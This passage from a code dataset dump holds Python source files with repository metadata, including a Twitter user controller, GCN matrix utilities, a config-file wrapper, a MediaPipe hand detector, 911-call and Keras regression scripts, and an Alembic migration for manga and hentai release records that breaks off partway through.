"usage_type": "call"}, {"api_name": "PyQt5.QtWidgets.QApplication", "line_number": 303, "usage_type": "call"}, {"api_name": "PyQt5.QtWidgets", "line_number": 303, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 303, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 306, "usage_type": "call"}]}
+{"seq_id": "3548710544", "text": "from typing import List, Dict, Set\n\nfrom deps import api\nfrom models import UserModel, TweetModel\n\n\nclass UserController:\n def __init__(self):\n self.tweets: List[TweetModel] = []\n self.user_names: List[str] = []\n self.user_dict: Dict[str, UserModel] = {}\n self.hash_to_user: Dict[str, Set[UserModel]] = {}\n\n def load_from_tweets(self, tweets: List[TweetModel]):\n self.tweets = tweets\n self.user_names = list(set([tweet.user_name for tweet in tweets]))\n\n def get_by_username(self, user_name: str) -> UserModel:\n if user_name in self.user_dict:\n return self.user_dict[user_name]\n\n tweepy_user = api.get_user(user_name)\n user = UserModel.from_tweepy_object(tweepy_user)\n self.user_dict[user.user_name] = user\n\n return user\n\n def load_hash_to_user_dict(self):\n self.hash_to_user = {}\n\n for tweet in self.tweets:\n for hash_tag in tweet.hash_tags:\n if hash_tag not in self.hash_to_user:\n self.hash_to_user[hash_tag] = set()\n\n self.hash_to_user[hash_tag].add(self.get_by_username(tweet.user_name))\n", "repo_name": "supercmmetry/twitter-viz", "sub_path": "controllers/users.py", "file_name": "users.py", "file_ext": "py", "file_size_in_byte": 1165, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "typing.List", "line_number": 9, "usage_type": "name"}, {"api_name": "models.TweetModel", "line_number": 9, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 10, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 11, "usage_type": "name"}, {"api_name": "models.UserModel", "line_number": 11, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Set", "line_number": 12, "usage_type": "name"}, {"api_name": "models.UserModel", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 14, "usage_type": "name"}, {"api_name": "models.TweetModel", "line_number": 14, "usage_type": "name"}, {"api_name": "deps.api.get_user", "line_number": 22, "usage_type": "call"}, {"api_name": "deps.api", "line_number": 22, "usage_type": "name"}, {"api_name": "models.UserModel.from_tweepy_object", "line_number": 23, "usage_type": "call"}, {"api_name": "models.UserModel", "line_number": 23, "usage_type": "name"}, {"api_name": "models.UserModel", "line_number": 18, "usage_type": "name"}]}
+{"seq_id": "17430783812", "text": "import numpy as np\r\nimport scipy.sparse as sp\r\nimport torch\r\nimport scipy.io as sio\r\nimport random\r\n\r\n\r\ndef normalize(mx):\r\n \"\"\"Row-normalize sparse matrix\"\"\"\r\n rowsum = np.array(mx.sum(1))\r\n r_inv = np.power(rowsum, -1).flatten()\r\n r_inv[np.isinf(r_inv)] = 0.\r\n r_mat_inv = sp.diags(r_inv)\r\n mx = r_mat_inv.dot(mx)\r\n return mx\r\n\r\n\r\ndef normalize_adj(adj):\r\n \"\"\"Symmetrically normalize adjacency matrix.\"\"\"\r\n adj = sp.coo_matrix(adj)\r\n rowsum = np.array(adj.sum(1)) # D\r\n d_inv_sqrt = np.power(rowsum, -0.5).flatten() # D^-0.5\r\n d_inv_sqrt[np.isinf(d_inv_sqrt)] = 0.\r\n d_mat_inv_sqrt = sp.diags(d_inv_sqrt) # D^-0.5\r\n return adj.dot(d_mat_inv_sqrt).transpose().dot(d_mat_inv_sqrt).tocoo() # D^-0.5AD^0.5\r\n\r\n\r\ndef preprocess_adj(adj):\r\n \"\"\"Preprocessing of adjacency matrix for simple GCN model and conversion to tuple representation.\"\"\"\r\n adj_normalized = normalize_adj(adj + sp.eye(adj.shape[0]))\r\n return adj_normalized\r\n\r\n\r\ndef sparse_mx_to_torch_sparse_tensor(sparse_mx):\r\n \"\"\"Convert a scipy sparse matrix to a torch sparse tensor.\"\"\"\r\n sparse_mx = sparse_mx.tocoo().astype(np.float32)\r\n indices = torch.from_numpy(\r\n np.vstack((sparse_mx.row, sparse_mx.col)).astype(np.int64))\r\n values = torch.from_numpy(sparse_mx.data)\r\n shape = torch.Size(sparse_mx.shape)\r\n return torch.sparse.FloatTensor(indices, values, shape)\r\n\r\n\r\n", "repo_name": "betterzhou/AAGNN", "sub_path": "utils.py", "file_name": "utils.py", "file_ext": "py", "file_size_in_byte": 1404, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.array", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 12, "usage_type": "call"}, {"api_name": "scipy.sparse.diags", "line_number": 13, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 13, "usage_type": "name"}, {"api_name": "scipy.sparse.coo_matrix", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 22, "usage_type": "call"}, {"api_name": "numpy.isinf", "line_number": 23, "usage_type": "call"}, {"api_name": "scipy.sparse.diags", "line_number": 24, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 24, "usage_type": "name"}, {"api_name": "scipy.sparse.eye", "line_number": 30, "usage_type": "call"}, {"api_name": "scipy.sparse", "line_number": 30, "usage_type": "name"}, {"api_name": "numpy.float32", "line_number": 36, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.vstack", "line_number": 38, "usage_type": "call"}, {"api_name": "numpy.int64", "line_number": 38, "usage_type": "attribute"}, {"api_name": "torch.from_numpy", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.Size", "line_number": 40, "usage_type": "call"}, {"api_name": "torch.sparse.FloatTensor", "line_number": 41, "usage_type": "call"}, {"api_name": "torch.sparse", "line_number": 41, "usage_type": "attribute"}]}
+{"seq_id": "19334491259", "text": "from configparser import ConfigParser\n\nclass Config():\n def __init__(self, file_name= 'config.ini'):\n self.file_name = file_name\n self.config = ConfigParser()\n self.config.read(self.file_name, encoding=\"utf-8\")\n\n def save(self):\n \"\"\"Save the configuration\"\"\"\n with open(self.file_name,\"w+\",encoding=\"utf-8\") as file_obj:\n self.config.write(file_obj)\n\n def get_config(self, section, option):\n \"\"\"\"Returns the value of option in the section\"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n\n if not self.config.has_option(section, option):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there is no section or option\"\n return ret\n\n ret[\"data\"] = self.config[section][option]\n return ret\n \n def set_config(self, section, option, value):\n \"\"\"Set the value in the option of the section, if no the option, to create it \"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n\n if not self.config.has_section(section):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there is no section\"\n elif not self.config.has_option(section, option):\n ret[\"info\"] = \"there is no option, but create one\"\n\n self.config.set(section, option, value)\n self.save()\n return ret\n \n def add_section(self, section):\n \"\"\"Add a section to the configuration\"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n if self.config.has_section(section):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there has already this section\"\n return ret\n \n self.config.add_section(section)\n self.save()\n return ret\n\n def remove_section(self, section):\n \"\"\"Remove a section to the configuration\"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n if not self.config.has_section(section):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there is no section\"\n return ret\n\n self.config.remove_section(section)\n self.save()\n return ret\n\n def remove_option(self, section, option):\n \"\"\"Remove a option to the configuration\"\"\"\n ret = {\"ret_val\":True, \"data\":\"\", \"info\":\"normal operation\"}\n\n if not self.config.has_option(section, option):\n ret[\"ret_val\"] = False\n ret[\"info\"] = \"there is no section or option\"\n return ret \n \n self.config.remove_option(section, option)\n self.save()\n return ret\n\nif __name__ == \"__main__\":\n config = Config()\n print(config.get_config(\"input\", \"suffix\"))\n\n \n", "repo_name": "LeoJiaGeng/JiaGengXiong-Python-Files", "sub_path": "Search/Demo/Public/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 2749, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "configparser.ConfigParser", "line_number": 6, "usage_type": "call"}]}
+{"seq_id": "41479475184", "text": "import cv2\nimport mediapipe as mp\n\nclass handDetector():\n def __init__(self, mode=False, maxHands=2, detectionCon=0.7, trackCon=0.5):\n self.mode = mode\n self.maxHands = maxHands\n self.detectionCon = detectionCon\n self.trackCon = trackCon\n\n self.mpHands = mp.solutions.hands\n self.hands = self.mpHands.Hands(self.mode, self.maxHands,\n self.detectionCon, self.trackCon)\n self.mpDraw = mp.solutions.drawing_utils\n\n def findHands(self, img, draw=True):\n imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n self.results = self.hands.process(imgRGB)\n if self.results.multi_hand_landmarks:\n for handLms in self.results.multi_hand_landmarks:\n if draw:\n self.mpDraw.draw_landmarks(img, handLms,\n self.mpHands.HAND_CONNECTIONS)\n return img\n\n def findPosition(self, img, draw=True):\n rlmlist = []\n\n if self.results.multi_hand_landmarks:\n if len(self.results.multi_hand_landmarks) == 2:\n rlmlist.append('both')\n elif len(self.results.multi_hand_landmarks) == 1:\n rlmlist.append(self.results.multi_handedness[0].classification[0].label)\n\n for n in self.results.multi_hand_landmarks:\n lmList = []\n myHand = n\n for id, lm in enumerate(myHand.landmark):\n h, w, c = img.shape\n cx, cy = int(lm.x * w), int(lm.y * h)\n lmList.append([id, cx, cy])\n if draw:\n cv2.circle(img, (cx, cy), 15, (255, 0, 255), cv2.FILLED)\n rlmlist.append(lmList)\n\n return rlmlist\n\n\n", "repo_name": "i5han2/Volume_and_Brightness_Control_Using_Hand_Gestures", "sub_path": "handLmModel.py", "file_name": "handLmModel.py", "file_ext": "py", "file_size_in_byte": 1792, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "31", "api": [{"api_name": "mediapipe.solutions", "line_number": 11, "usage_type": "attribute"}, {"api_name": "mediapipe.solutions", "line_number": 14, "usage_type": "attribute"}, {"api_name": "cv2.cvtColor", "line_number": 17, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 17, "usage_type": "attribute"}, {"api_name": "cv2.circle", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.FILLED", "line_number": 43, "usage_type": "attribute"}]}
+{"seq_id": "37017585632", "text": "import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\ndef split_string(string):\n new_str = string.split(':', 1)\n #print(new_str[0])\n return new_str[0]\n\n\ndmap = {0:'Mon',1:'Tue',2:'Wed',3:'Thu',4:'Fri',5:'Sat',6:'Sun'}\n\nfile911='/home/edoardo/Udemy/DataScience/Dispense/10-Data-Capstone-Projects/911.csv'\n\ndf = pd.read_csv(file911)\n\nprint(df.info())\nprint(df.head())\nprint(df.head(0))\n#print(df['zip'].value_counts())\n#print(df['twp'].value_counts())\n#print(len(df['title'].apply(lambda x: split_string(x)))\ndf['Reason'] = df['title'].apply(lambda x: split_string(x))\n\n#print(df['Reasons'].value_counts())\n#sns.countplot(x = 'Reasons', data = df)\n\n#print(type(df['timeStamp'].values[0]))\ntime = pd.to_datetime(df['timeStamp'].values)\n\ndf['Hour'] = time.hour\ndf['Month'] = time.month\n#df['Day of the week'] = time.dayoftheweek\n\nprint((df['Hour']))\n#print((df['Day of the week']))\n\nsns.countplot(x='Month', hue = 'Reason', data = df)\n#plt.legend()\n\nplt.show()\n\n\n\n", "repo_name": "EdoardoCarlesi/DataScience", "sub_path": "03_capstone_capst.py", "file_name": "03_capstone_capst.py", "file_ext": "py", "file_size_in_byte": 1009, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_csv", "line_number": 16, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 30, "usage_type": "call"}, {"api_name": "seaborn.countplot", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]}
+{"seq_id": "31297389490", "text": "'''\nWeek 3 - Problem 2\nSolution using Keras\n\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport tensorflow.compat.v1 as tf\nimport keras\nfrom keras.models import Sequential\nfrom keras.layers import Dense\n\n# Disable 2.0 behavior\ntf.disable_v2_behavior()\n\n### Generate the data ###\ndef generate_data(random_seed, n_samples):\n tf.set_random_seed(random_seed)\n train_x = np.linspace(0,20,n_samples)\n train_y = 3.7 * train_x + 14 + 4 * np.random.randn(n_samples)\n print(\"X data\")\n print(\"------\")\n print(\"Size: \" + str(np.shape(train_x)))\n print(train_x)\n print(\"Y data\")\n print(\"------\")\n print(\"Size: \" + str(np.shape(train_y)))\n print(train_y)\n plt.plot(train_x, train_y,'o')\n plt.waitforbuttonpress()\n plt.close()\n return(train_x, train_y)\n\ndef model_keras(x_data, y_data, epochs):\n model = Sequential()\n model.add(Dense(1, input_dim=1, kernel_initializer='normal', activation='linear'))\n \n #Compile the model\n model.compile(loss='mean_squared_error', optimizer='rmsprop', metrics=['mse'])\n\n #Dump the model\n model.summary()\n\n #Suppressing the per-epoch messages\n hist = model.fit(x_data, y_data, epochs=epochs, verbose=0)\n\n weightBias = model.layers[0].get_weights()\n #print('Weight and Bias with Keras: \" + weightBias)\n print(weightBias)\n plt.plot(train_x, train_y,'o')\n plt.plot(x_data, weightBias[0][0]*x_data + weightBias[1])\n plt.waitforbuttonpress()\n\ntrain_x, train_y = generate_data(42, 30)\nmodel_keras(train_x, train_y, 20000)\n", "repo_name": "saramach/ucsd-deeplearning-tf-CSE-41312", "sub_path": "Week3/Problem2.py", "file_name": "Problem2.py", "file_ext": "py", "file_size_in_byte": 1536, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tensorflow.compat.v1.disable_v2_behavior", "line_number": 14, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 14, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.set_random_seed", "line_number": 18, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1", "line_number": 18, "usage_type": "name"}, {"api_name": "numpy.linspace", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.random.randn", "line_number": 20, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 20, "usage_type": "attribute"}, {"api_name": "numpy.shape", "line_number": 23, "usage_type": "call"}, {"api_name": "numpy.shape", "line_number": 27, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.waitforbuttonpress", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "keras.models.Sequential", "line_number": 35, "usage_type": "call"}, {"api_name": "keras.layers.Dense", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": 
"matplotlib.pyplot.waitforbuttonpress", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}]}
+{"seq_id": "12652160041", "text": "\"\"\"Migrate Hentai Data\n\nRevision ID: 0ab876947815\nRevises: fd657f7977c2\nCreate Date: 2018-02-23 22:30:17.727678\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '0ab876947815'\ndown_revision = '1d6c79218b3e'\nbranch_labels = None\ndepends_on = None\n\nimport traceback\nimport sys\nimport threading\nimport concurrent.futures\n\nfrom alembic import op\nimport sqlalchemy as sa\n\nimport sqlalchemy_utils\nimport sqlalchemy_jsonfield\n\n# Patch in knowledge of the citext type, so it reflects properly.\nfrom sqlalchemy.dialects.postgresql.base import ischema_names\nimport citext\nimport queue\nimport datetime\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy.dialects.postgresql import TSVECTOR\nischema_names['citext'] = citext.CIText\n\n\nimport datetime\nimport cachetools\nimport tqdm\nimport json\nimport hashlib\nimport os.path\n\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlalchemy_utils\n\n# Patch in knowledge of the citext type, so it reflects properly.\nfrom sqlalchemy.orm.session import Session\nfrom sqlalchemy.dialects.postgresql.base import ischema_names\nimport citext\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy.dialects.postgresql import TSVECTOR\nischema_names['citext'] = citext.CIText\n\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.orm import scoped_session\nfrom sqlalchemy.orm import backref\nfrom sqlalchemy.orm import joinedload\nfrom sqlalchemy import Table\nfrom sqlalchemy import Index\n\nfrom sqlalchemy import Column\nfrom sqlalchemy import Integer\nfrom sqlalchemy import BigInteger\nfrom sqlalchemy import Text\nfrom sqlalchemy import Float\nfrom sqlalchemy import Boolean\nfrom sqlalchemy import DateTime\nfrom sqlalchemy import ForeignKey\nfrom sqlalchemy import PrimaryKeyConstraint\nfrom sqlalchemy.orm import relationship\nfrom sqlalchemy.schema import UniqueConstraint\nimport sqlalchemy_jsonfield\n\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.ext.associationproxy import association_proxy\n\n# Patch in knowledge of the citext type, so it reflects properly.\nfrom sqlalchemy.dialects.postgresql.base import ischema_names\nfrom sqlalchemy.dialects.postgresql import ENUM\nfrom sqlalchemy.ext.declarative import declarative_base\n\ndlstate_enum = ENUM('new', 'fetching', 'processing', 'complete', 'error', 'removed', 'disabled', 'upload', 'missing', name='dlstate_enum')\ndir_type = ENUM('had_dir', 'created_dir', 'unknown', name='dirtype_enum')\nfile_type = ENUM('manga', 'hentai', 'unknown', name='filetype_enum')\n\n\ndef upgrade():\n\t# ### commands auto generated by Alembic - please #\n\n\timport MangaCMSOld.lib.dbPool\n\n\tif \"testing\" in sys.argv:\n\t\treturn\n\n\tdef go(mode):\n\t\tbind = op.get_bind()\n\t\tsess = Session(bind=bind)\n\n\t\t# Cache 500K items, with a 30 minute ttl\n\t\ttag_cache_size = 500 * 1000\n\t\ttag_cache_ttl = 60 * 30\n\n\t\t########################################################################################\n\n\t\tBase = declarative_base()\n\n\t\t########################################################################################\n\n\t\tmanga_files_tags_link = Table(\n\t\t\t\t'manga_files_tags_link', Base.metadata,\n\t\t\t\tColumn('releases_id', Integer, ForeignKey('release_files.id'), nullable=False),\n\t\t\t\tColumn('tags_id', Integer, ForeignKey('manga_tags.id'), 
nullable=False),\n\t\t\t\tPrimaryKeyConstraint('releases_id', 'tags_id')\n\t\t\t)\n\t\tmanga_releases_tags_link = Table(\n\t\t\t\t'manga_releases_tags_link', Base.metadata,\n\t\t\t\tColumn('releases_id', Integer, ForeignKey('manga_releases.id'), nullable=False),\n\t\t\t\tColumn('tags_id', Integer, ForeignKey('manga_tags.id'), nullable=False),\n\t\t\t\tPrimaryKeyConstraint('releases_id', 'tags_id')\n\t\t\t)\n\n\t\tclass MangaTags(Base):\n\t\t\t__tablename__ = 'manga_tags'\n\t\t\tid = Column(Integer, primary_key=True)\n\t\t\ttag = Column(citext.CIText(), nullable=False, index=True)\n\n\t\t\t__table_args__ = (\n\t\t\t\t\tUniqueConstraint('tag'),\n\t\t\t\t)\n\n\t\t\t@classmethod\n\t\t\t@cachetools.cached(cache=cachetools.TTLCache(tag_cache_size, tag_cache_ttl))\n\t\t\tdef get_or_create(cls, tag):\n\t\t\t\ttmp = sess.query(cls) \\\n\t\t\t\t\t.filter(cls.tag == tag) \\\n\t\t\t\t\t.scalar()\n\t\t\t\tif tmp:\n\t\t\t\t\tsess.expunge(tmp)\n\t\t\t\t\treturn tmp\n\n\t\t\t\t# print(\"manga_tag_creator\", tag)\n\t\t\t\ttmp = cls(tag=tag)\n\t\t\t\tsess.add(tmp)\n\t\t\t\tsess.commit()\n\t\t\t\tsess.expunge(tmp)\n\t\t\t\treturn tmp\n\n\n\t\t########################################################################################\n\n\t\tclass MangaReleases(Base):\n\t\t\t__tablename__ = 'manga_releases'\n\t\t\tid = Column(BigInteger, primary_key=True)\n\t\t\tstate = Column(dlstate_enum, nullable=False, index=True, default='new')\n\t\t\terr_str = Column(Text)\n\n\t\t\tsource_site = Column(Text, nullable=False, index=True) # Actual source site\n\t\t\tsource_id = Column(Text, nullable=False, index=True) # ID On source site. Usually (but not always) the item URL\n\n\t\t\tfirst_seen = Column(DateTime, nullable=False)\n\t\t\tposted_at = Column(DateTime, nullable=False, default=datetime.datetime.min)\n\t\t\tdownloaded_at = Column(DateTime, nullable=False, default=datetime.datetime.min)\n\t\t\tlast_checked = Column(DateTime, nullable=False, default=datetime.datetime.min)\n\n\t\t\tdeleted = Column(Boolean, default=False, nullable=False)\n\t\t\twas_duplicate = Column(Boolean, default=False, nullable=False)\n\t\t\tphash_duplicate = Column(Boolean, default=False, nullable=False)\n\t\t\tuploaded = Column(Boolean, default=False, nullable=False)\n\n\t\t\tdirstate = Column(dir_type, nullable=False, default=\"unknown\")\n\n\t\t\torigin_name = Column(Text)\n\t\t\tseries_name = Column(Text, index=True)\n\n\t\t\tadditional_metadata = Column(sqlalchemy_jsonfield.JSONField())\n\n\t\t\tfileid = Column(BigInteger, ForeignKey('release_files.id'))\n\t\t\tfile = relationship('ReleaseFile', backref='manga_releases')\n\n\t\t\ttags_rel = relationship('MangaTags',\n\t\t\t\t\t\t\t\t\t\t\t\tsecondary = manga_releases_tags_link,\n\t\t\t\t\t\t\t\t\t\t\t\tbackref = backref(\"manga_releases\", lazy='dynamic'),\n\t\t\t\t\t\t\t\t\t\t\t\tcollection_class = set)\n\t\t\ttags = association_proxy('tags_rel', 'tag', creator=MangaTags.get_or_create)\n\n\t\t\t__table_args__ = (\n\t\t\t\t\tUniqueConstraint('source_site', 'source_id'),\n\t\t\t\t\tIndex('manga_releases_source_site_id_idx', 'source_site', 'source_id')\n\t\t\t\t)\n\n\n\n\n\t\tclass ReleaseFile(Base):\n\t\t\t__tablename__ = 'release_files'\n\t\t\tid = Column(BigInteger, primary_key=True)\n\n\t\t\tdirpath = Column(Text, nullable=False)\n\t\t\tfilename = Column(Text, nullable=False)\n\t\t\tfhash = Column(Text, nullable=False)\n\t\t\tfile_type = Column(file_type, nullable=False, default=\"unknown\")\n\n\t\t\twas_duplicate = Column(Boolean, default=False, nullable=False)\n\n\t\t\tlast_dup_check = 
Column(DateTime, nullable=False, default=datetime.datetime.min)\n\n\t\t\tmanga_tags_rel = relationship('MangaTags',\n\t\t\t\t\t\t\t\t\t\t\t\tsecondary=manga_files_tags_link,\n\t\t\t\t\t\t\t\t\t\t\t\tbackref=backref(\"release_files\", lazy='dynamic'),\n\t\t\t\t\t\t\t\t\t\t\t\tcollection_class=set)\n\t\t\tmanga_tags = association_proxy('manga_tags_rel', 'tag', creator=MangaTags.get_or_create)\n\n\t\t\t# releases = relationship('MangaReleases')\n\n\t\t\t__table_args__ = (\n\t\t\t\tUniqueConstraint('dirpath', 'filename'),\n\t\t\t\tUniqueConstraint('fhash'),\n\t\t\t\t)\n\n\n\t\tdef get_add_file(sess, fname, fpath):\n\t\t\tif fpath is None or fname is None:\n\t\t\t\treturn None\n\t\t\tfqname = os.path.join(fpath, fname)\n\t\t\tif not os.path.exists(fqname):\n\t\t\t\treturn None\n\t\t\tif os.path.isdir(fqname):\n\t\t\t\treturn None\n\n\t\t\thave = sess.query(ReleaseFile) \\\n\t\t\t\t.filter(ReleaseFile.dirpath == fpath) \\\n\t\t\t\t.filter(ReleaseFile.filename == fname) \\\n\t\t\t\t.scalar()\n\n\t\t\tif have:\n\t\t\t\treturn have\n\n\n\t\t\t# print(\"Hashing file...\", end=\"\", flush=True)\n\t\t\thash_md5 = hashlib.md5()\n\t\t\twith open(fqname, \"rb\") as f:\n\t\t\t\thash_md5.update(f.read())\n\t\t\tfhash = hash_md5.hexdigest()\n\t\t\t# print(\"done.\")\n\n\n\t\t\thave = sess.query(ReleaseFile) \\\n\t\t\t\t.filter(ReleaseFile.fhash == fhash) \\\n\t\t\t\t.scalar()\n\n\t\t\tif have:\n\t\t\t\t# print(\"Have by fhash\")\n\t\t\t\treturn have\n\n\t\t\tnew = ReleaseFile(\n\t\t\t\tdirpath = fpath,\n\t\t\t\tfilename = fname,\n\t\t\t\tfhash = fhash\n\t\t\t\t)\n\t\t\tsess.add(new)\n\t\t\treturn new\n\n\n\t\tdef migrate_manga_tags(row, flags, tags):\n\t\t\t# print(\"Tags:\", tags)\n\t\t\ttags = tags.split(\" \")\n\t\t\ttags = [tmp for tmp in tags if not tmp.startswith(\"crosslink-\")]\n\n\t\t\ttags = [tmp.replace(\"-(female)\", \"-female\").replace(\"-(male)\", \"-male\") for tmp in tags]\n\t\t\ttags = [tmp for tmp in tags if len(tmp) >= 2]\n\n\t\t\ttags = set(tags)\n\t\t\ttags = tags - set([\"phash-duplicate\", \"was-duplicate\", \"uploaded\", 'dup-checked', 'deleted'])\n\n\t\t\tif not tags:\n\t\t\t\treturn\n\n\t\t\tif row.file:\n\t\t\t\trow.file.manga_tags.update(tags)\n\t\t\trow.tags.update(tags)\n\n\t\tdef dlstate_decode(state_int):\n\n\t\t\tstate_val = \"new\"\n\t\t\tif state_int == 1:\n\t\t\t\tstate_val = 'fetching'\n\t\t\telif state_int == 2:\n\t\t\t\tstate_val = 'complete'\n\t\t\telif state_int == 3:\n\t\t\t\tstate_val = 'upload'\n\t\t\telif state_int > 3:\n\t\t\t\tstate_val = 'disabled'\n\t\t\telif state_int < 0:\n\t\t\t\tstate_val = 'error'\n\t\t\treturn state_val\n\n\t\tdef dirstate_decode(flags):\n\n\t\t\tdirstate_val = \"unknown\"\n\t\t\tif \"haddir\" in flags:\n\t\t\t\tdirstate_val = \"had_dir\"\n\t\t\telif \"new_dir\" in flags:\n\t\t\t\tdirstate_val = \"created_dir\"  # dirtype_enum defines 'created_dir', not 'new_dir'\n\t\t\treturn dirstate_val\n\n\t\tdef go_manga():\n\n\t\t\told_con = MangaCMSOld.lib.dbPool.pool.getconn()\n\t\t\told_cur = old_con.cursor()\n\n\t\t\t# print(\"Connection:\", old_con)\n\t\t\t# print(\"Cursor:\", old_cur)\n\t\t\t# print(\"Session:\", sess)\n\t\t\told_cur.execute(\"SELECT sourcesite, dlstate, sourceurl, retreivaltime, lastupdate, sourceid, seriesname, filename, originname, downloadpath, flags, tags, note FROM mangaitems ORDER BY dbid DESC\")\n\n\t\t\tfetchchunk = 1000\n\t\t\titems = []\n\n\t\t\tprint(\"Loading %s rows from DB\" % mode)\n\t\t\titems = old_cur.fetchall()\n\t\t\tprint(\"Loaded %s %s rows\" % (len(items), mode))\n\n\t\t\tprint(\"Barrier released!\")\n\t\t\tnew = 0\n\t\t\tfor item in tqdm.tqdm(items, 
desc=\"Processing %s\" % mode, position=1 if mode == \"hentai\" else 0):\n\t\t\t\tsourcesite, dlstate, sourceurl, retreivaltime, lastupdate, sourceid, seriesname, filename, originname, downloadpath, flags, tags, note = item\n\n\t\t\t\ttags = tags if tags else \"\"\n\t\t\t\tflags = flags if flags else \"\"\n\n\t\t\t\thave = sess.query(MangaReleases) \\\n\t\t\t\t\t.filter(MangaReleases.source_id == sourceurl) \\\n\t\t\t\t\t.options(joinedload(\"file\"), joinedload(\"file.manga_tags_rel\"), joinedload(\"tags_rel\"), ) \\\n\t\t\t\t\t.scalar()\n\n\t\t\t\tif have:\n\t\t\t\t\tmigrate_manga_tags(have, flags, tags)\n\t\t\t\t\t# print(\"Skipping!\")\n\t\t\t\t\tcontinue\n\n\t\t\t\tfile = get_add_file(sess, filename, downloadpath)\n\t\t\t\tsess.flush()\n\n\t\t\t\t# print(\"'{}', '{}'\".format(flags, tags))\n\t\t\t\ttags = tags if tags else \"\"\n\t\t\t\tflags = flags if flags else \"\"\n\n\t\t\t\tstate_val = dlstate_decode(dlstate)\n\t\t\t\tdirstate_val = dirstate_decode(flags)\n\n\n\t\t\t\tadditional_metadata = {}\n\t\t\t\tif file is None:\n\t\t\t\t\tstate_val = 'missing'\n\t\t\t\t\tadditional_metadata = {\n\t\t\t\t\t\t'filename' : filename,\n\t\t\t\t\t\t'downloadpath' : downloadpath,\n\t\t\t\t\t}\n\n\n\n\t\t\t\tif sourceid:\n\t\t\t\t\tloaded_meta = json.loads(sourceid)\n\n\t\t\t\t\tadditional_metadata['sourceid'] = loaded_meta\n\t\t\t\tif note:\n\t\t\t\t\tadditional_metadata['note'] = note\n\t\t\t\t\t# print(\"Note:\", note)\n\n\t\t\t\tdl_at = datetime.datetime.utcfromtimestamp(lastupdate)\n\t\t\t\tposted_at = datetime.datetime.utcfromtimestamp(retreivaltime)\n\n\t\t\t\trow 